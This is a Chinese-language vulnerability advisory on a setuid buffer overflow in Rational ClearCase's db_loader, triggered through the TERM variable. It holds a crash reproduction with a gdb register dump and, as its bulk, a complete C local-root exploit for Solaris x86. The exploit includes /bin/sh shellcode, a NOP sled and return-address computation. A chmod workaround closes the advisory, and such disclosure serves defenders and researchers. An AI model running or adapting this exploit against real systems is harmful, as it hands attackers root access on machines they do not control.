
安全漏洞
Rational ClearCase DB Loader TERM 环境变量缓冲区溢出漏洞

发布日期:2001-11-08
更新日期:2001-11-13

受影响系统:

Rational ClearCase 3.2
Rational ClearCase 4.0
Rational ClearCase 4.1
Rational ClearCase 4.2
   - Caldera OpenUnix 8.0
   - Caldera UnixWare 7
   - Compaq Tru64 5.0
   - Compaq Tru64 5.0a
   - Compaq Tru64 5.0f
   - Compaq Tru64 5.1
   - Compaq Tru64 5.1a
   - HP HP-UX 10.20
   - HP HP-UX 11.0
   - HP HP-UX 11.11
   - IBM AIX 4.3
   - IBM AIX 4.3.1
   - IBM AIX 4.3.2
   - IBM AIX 4.3.3
   - IBM AIX 5.1
   - RedHat Linux 6.2
   - RedHat Linux 7.0
   - RedHat Linux 7.1
   - RedHat Linux 7.2
   - SGI IRIX 6.5.11m
   - SGI IRIX 6.5.12
   - SGI IRIX 6.5.12f
   - SGI IRIX 6.5.12m
   - SGI IRIX 6.5.13
   - SGI IRIX 6.5.13f
   - SGI IRIX 6.5.13m
   - Siemens Reliant UNIX 5.43
   - Siemens Reliant UNIX 5.44
   - Siemens Reliant UNIX 5.45
   - Sun Solaris 2.6
   - Sun Solaris 7.0
   - Sun Solaris 8.0
描述:

BUGTRAQ ID: 3523

ClearCase 是一款由 Rational 维护和发布的软件变动管理软件包。该软件存在一个安全问题:随软件安装的 db_loader 程序带有 setuid 位,可能允许本地攻击者获取 root 权限。

由于 db_loader 没有正确检查用户可控的 TERM 环境变量的长度,本地攻击者通过设置一个超长且精心构造的 TERM 值,可能触发缓冲区溢出并执行任意代码,从而提升权限。

<*来源:xundi (xundi@xfocus.org)
  参考:http://archives.neohapsis.com/archives/bugtraq/2001-11/0046.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


xundi (xundi@xfocus.org)提供了如下测试代码:

$ TERM=`perl -e 'print "A"x550'`
$ export TERM
$ /usr/atria/etc/db_loader
Bus Error
$ gdb db_loader core -q
(no debugging symbols found)...Core was generated by `./db_loader'.
Cannot access memory at address 0xffffffffff3e1b80
#0  0xf0db8 in imsg_fputs ()
(gdb) bt
#0  0xf0db8 in imsg_fputs ()
Cannot access memory at address 0x41414179
(gdb) i reg
g0             0x0      0
g1             0x7b000  503808
g2             0x13cf84 1298308
g3             0x0      0
g4             0xf6c2c  1010732
g5             0x0      0
g6             0x0      0
g7             0x143d58 1326424
o0             0xffffffff       -1
o1             0x1      1
o2             0xffbef054       -4263852
o3             0xf0c3c  986172
o4             0xffbeed8a       -4264566
o5             0xffffffff       -1
sp             0xffbeef70       -4264080
o7             0xf0db0  986544
l0             0x41414141       1094795585
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0x41414141       1094795585
i7             0x41414141       1094795585
y              0x0      0
psr            0xfe801007       -25161721       icc:N---, pil:0, s:0, ps:0, et:0, cwp:7
wim            0x0      0
tbr            0x0      0
pc             0xf0db8  986552
npc            0xf0dbc  986556
fpsr           0x0      0       rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr           0x0      0
(gdb)

-----------------------------
ClearCase_x86exp.c

/* Rational ClearCase TERM environment variable buffer overflow exploit
*  tested against Solaris x86 7, bug found by virtualcat@xfocus.org
*  xploit by xundi@xfocus.org
*  website: http://xfocus.org
*/

#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>

/* Byte offset from the start of the TERM value at which main() stores the
 * replacement return address; it matches the 550-byte TERM value that
 * produced the crash in the session above.                                 */
#define    RET_DIS            550
/* 0x90 is the single-byte x86 NOP; NNOP of them are written before the payload. */
#define    NOP            0x90
#define    NNOP            512

/* Name of the environment variable that db_loader fails to bounds-check. */
#define    ENV_VAR            "TERM"

/* Upper address bound for the stack scan in getEnvAddr(); presumably the top
 * of the user stack on 32-bit Solaris x86 -- TODO confirm for the target.  */
#define    USER_UPPER_MAGIC    0x08047fff

/* Shell code taken from Pablo Sor's "mailx -F" exploit code    */
/* Payload bytes copied into the buffer after the NOP run. main() measures it
 * with strlen(), which only works because the array holds no 0x00 byte.    */
char shellCode[] =
    "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
    "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
    "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
    "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
    "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
    "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";


/* Returns the current stack pointer (32-bit x86 only).
 * The inline asm leaves %esp in %eax and there is no return statement, so the
 * value reaches the caller only through the i386 convention of returning in
 * %eax. In standard C this is undefined behaviour and an optimising compiler
 * is free to break it.                                                       */
int get_esp()
{
    __asm__("mov %esp,%eax");
}

/* Scans memory upward from the current stack pointer to USER_UPPER_MAGIC and
 * returns, as an int, the address of the first 4-byte match of envPtr, or 0
 * (NULL) if no match occurs before the bound.
 *
 * Only four bytes are compared, so for ENV_VAR ("TERM") the first hit is any
 * occurrence of those letters above the stack pointer, not necessarily the
 * "TERM=" entry of the environment block. Nothing checks that every address
 * up to the bound is mapped; this presumably relies on the stack layout of
 * the intended platform -- TODO confirm.                                   */
int  getEnvAddr(const char* envPtr)
{
    int    envAddr = NULL;   /* NULL used as integer 0; addresses are kept in int (32-bit only) */
    int    retCode = 0;

    char* charPtr = (char *) get_esp();   /* scan starts at the current stack pointer */

    /* Search for the starting address of the environment string for    */
    /* the specified environment variable                    */
    while((unsigned int)  charPtr < (unsigned int) USER_UPPER_MAGIC)
    {
        /* Compare 4 bytes at every byte offset; charPtr advances on a miss too. */
        retCode = memcmp((unsigned char *) charPtr++, envPtr, 4);
        /* Found */
        if(retCode == 0)
        {
            envAddr = (int) (charPtr - 1);   /* undo the post-increment: start of the match */
            break;
        }
    }

    return envAddr;
}

/* Builds an over-long "TERM=..." string, installs it with putenv() and
 * exec()s db_loader with that environment, reproducing the overflow the
 * advisory describes.
 *
 * The value written after "TERM=" is laid out as:
 *   RET_DIS bytes of 'A' | 4-byte retAddr | alignment pad | NNOP NOPs | shellCode | '\0'
 *
 * argv[1], when present, is an integer added to retAddr (a manual offset
 * tweak). retAddr is derived from where getEnvAddr() finds "TERM" on this
 * process's stack, shifted by the growth of the string (diff); it presumably
 * assumes the exec()ed process places its environment at the same addresses,
 * which is not verified here.
 *
 * main falls off the end on every path, so no exit status is returned.       */
int main(int argc, char** argv)
{

    char    buff[256] = {0};   /* unused */

    int*    intPtr = NULL;
    char*    buffPtr = NULL;
    char*    charPtr = NULL;

    int    retAddr = 0;
    int    retValue = 0;


    int    buffLen = 0;
    int    adjustment = 0;
    int    strLen = 0;
    int    alignment = 0;
    int    diff = 0;
    int    i;

    int shellCodeLen = strlen(shellCode);   /* payload is NUL-terminated, so strlen() works */

    /* Optional user-supplied offset applied to retAddr below */
    if(argc == 2)
    {
        adjustment = atoi(argv[1]);
    }

    /* Size of the new environment string: name + 'A' run + NOP run + payload + NUL */
    buffLen = strlen(ENV_VAR) + RET_DIS + NNOP + shellCodeLen + 1;

    charPtr = getenv(ENV_VAR);   /* the current TERM value; assumed to be set (not checked) */

    /* Adjust the stupid alignment    */
    /* Round the current value length (incl. NUL) and the new buffer length   */
    /* up to a multiple of 4, so diff below is a whole number of words.       */
    strLen = strlen(charPtr) + 1;
    alignment = strLen % 4;
    if(alignment != 0)
    {
        alignment = 4 - alignment;
        strLen += alignment;
    }

    alignment = buffLen % 4;
    if(alignment != 0)
    {
        alignment = 4 - alignment;
        buffLen += alignment;
    }     

    /* Where "TERM" currently sits above the stack pointer of this process */
    retValue = getEnvAddr(ENV_VAR);
     
    /* How much further down the new, longer string is expected to start */
    diff = buffLen - strLen;

    /* Expected address of the first byte after "TERM=" in the new layout */
    retAddr = retValue - diff + strlen(ENV_VAR) + 1;

    /* Round retAddr up to a word boundary; `alignment` keeps this remainder   */
    /* and is reused below to shift the NOP run by the same amount.            */
    alignment = retAddr % 4;

    if(alignment != 0)
    {
        alignment = 4 - alignment;
    }
    retAddr += RET_DIS + alignment +  adjustment;

    /* Allocate memory for the evil buffer    */
    buffPtr = (char *) malloc(buffLen);

    if(buffPtr != NULL)
    {

        strcpy(buffPtr, ENV_VAR);
        strcat(buffPtr, "=");
        charPtr = (char *) (buffPtr + strlen(buffPtr));     /* start of the value */
         
        /* Fill the rest of the buffer with 'A'     */
        /* 0x41 is the same byte pattern seen in the crash registers above */
        memset(charPtr, 0x41, buffLen - strlen(buffPtr)-4);

        /* Butt in the return address            */
        /* Stored RET_DIS bytes into the 'A' run, in native byte order */
        intPtr = (int *) (charPtr + RET_DIS);
        *intPtr++ = retAddr;

        /* Make sure the NOPs are located word aligned     */
        /* Uses the retAddr rounding computed earlier, not a property of buffPtr */
        charPtr = (char *) intPtr;
        charPtr += alignment;

        for(i=0; i<NNOP; i++)
        {
            *charPtr++ = NOP;
        }

        for(i=0; i<shellCodeLen; i++)
        {
            *charPtr++ = shellCode[i];
        }
        *charPtr = 0;

        /* putenv() keeps buffPtr itself (no copy), so the buffer is never freed */
        putenv(buffPtr);

        printf("Jumping to 0x%.8x\n", retAddr);

        /* Replaces this process; on failure execl() returns and main just ends */
        execl("/usr/atria/etc/db_loader", "xfocus", NULL);
    }
    else
    {
        printf("No more free memory!");   /* no newline, no non-zero exit status */
    }
}

/*..Thanks for all xfocus members.. especially virtualcat*/

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时去掉“db_loader”的setuid位,使其只以调用者自身的权限运行,这样即使溢出被触发,也无法借此获得 root 权限:
# chmod a-s /usr/atria/etc/db_loader

厂商补丁:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.rational.com/

